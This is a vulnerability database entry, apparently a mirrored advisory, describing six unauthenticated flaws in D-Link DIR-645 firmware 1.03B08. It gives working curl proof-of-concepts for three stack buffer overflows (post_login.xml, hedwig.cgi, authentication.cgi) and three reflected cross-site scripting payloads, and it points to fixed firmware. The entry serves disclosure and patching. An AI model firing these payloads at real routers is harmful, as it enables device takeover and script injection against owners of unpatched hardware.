ID

VAR-E-201308-0464

TITLE

D-Link DIR-645 1.03B08 - Multiple Vulnerabilities

AFFECTED PRODUCTS

EXPLOIT

This router model is affected by multiple security vulnerabilities. All of them
are exploitable by remote, unauthenticated attackers. Details are outlined in
the following, including some proof-of-concepts.
1. Buffer overflow on "post_login.xml"
Invoking the "post_login.xml" server-side script, attackers can specify a
"hash" password value that is used to authenticate the user. This hash value
is eventually processed by the "/usr/sbin/widget" local binary. However, the
latter copies the user-controlled hash into a statically-allocated buffer,
allowing attackers to overwrite adjacent memory locations.
As a proof-of-concept, the following URL allows attackers to control the
return value saved on the stack (the vulnerability is triggered when
executing "/usr/sbin/widget"):
curl http://<target ip>/post_login.xml?hash=AAA...AAABBBB
The value of the "hash" HTTP GET parameter consists in 292 occurrences of
the 'A' character, followed by four occurrences of character 'B'. In our lab
setup, characters 'B' overwrite the saved program counter (%ra).
2. Buffer overflow on "hedwig.cgi"
Another buffer overflow affects the "hedwig.cgi" CGI script. Unauthenticated
remote attackers can invoke this CGI with an overly-long cookie value that
can overflow a program buffer and overwrite the saved program address.
Proof-of-concept:
curl -b uid=$(perl -e 'print "A"x1400;') -d 'test' http://<target ip>/hedwig.cgi
3. Buffer overflow on "authentication.cgi"
The third buffer overflow vulnerability affects the "authentication.cgi" CGI
script. This time the issue affects the HTTP POST paramter named
"password". Again, this vulnerability can be abused to achieve remote code
execution. As for all the previous issues, no authentication is required.
Proof-of-concept:
curl -b uid=test -d $(perl -e 'print "uid=test&password=asd" . "A"x2024;') http://<target ip>/authentication.cgi
4. Cross-site scripting on "bind.php"
Proof-of-concept:
curl "http://<target ip>/parentalcontrols/bind.php?deviceid=test'\"/><script>alert(1)</script><"
5. Cross-site scripting on "info.php"
Proof-of-concept:
curl "http://<target ip>/info.php?RESULT=testme\", msgArray); alert(1); //"
6. Cross-site scripting on "bsc_sms_send.php"
Proof-of-concept:
curl "http://<target ip>/bsc_sms_send.php?receiver=testme\"/><script>alert(1);</script><div"
[REMEDIATION]
D-Link has released an updated firmware version (1.04) that addresses this
issue. The firmware is already available on D-Link web site, at the following
URL:
http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000

PRICE

free

TYPE

Multiple Vulnerabilities

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T09:12:03.814000+00:00

SOURCES RELEASE DATE